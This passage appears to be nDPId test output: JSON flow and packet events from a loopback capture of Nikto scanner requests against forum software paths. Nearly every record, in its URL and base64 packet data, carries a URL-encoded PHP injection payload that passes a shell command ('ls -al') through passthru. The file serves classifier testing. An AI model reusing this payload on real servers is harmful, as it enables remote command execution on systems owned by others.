{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01210{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 